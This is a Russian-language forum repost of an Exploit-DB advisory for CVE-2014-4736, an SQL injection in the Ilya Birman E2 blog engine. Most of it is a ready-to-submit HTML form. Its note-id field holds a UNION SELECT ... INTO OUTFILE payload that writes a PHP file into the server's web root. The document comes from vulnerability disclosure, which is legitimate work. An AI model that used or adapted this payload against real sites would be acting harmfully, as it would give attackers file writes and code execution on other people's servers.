- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39267
- Проверка EDB
-
- Пройдено
- Автор
- HIGH-TECH BRIDGE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2014-4736
- Дата публикации
- 2014-07-23
Ilya Birman E2 - '/@actions/comment-process' SQL Injection
HTML:
source: https://www.securityfocus.com/bid/68843/info
Ilya Birman E2 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
E2 v2844 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/@actions/comment-process" method="post" name="main">
<input type="hidden" name="already-subscribed" value="">
<input type="hidden" name="comment-id" value="new">
<input type="hidden" name="elton-john" value="1">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="from" value="">
<input type="hidden" name="name" value="name">
<input type="hidden" name="subscribe" value="on">
<input type="hidden" name="text" value="1">
<input type="hidden" name="note-id" value="' UNION SELECT '<? phpinfo(); ?>',2,3,4,5,1,7,8,9,10,11,12,13,14,15 INTO OUTFILE '/var/www/file.php' -- 2">
<input type="submit" id="btn">
</form>
- Источник
- www.exploit-db.com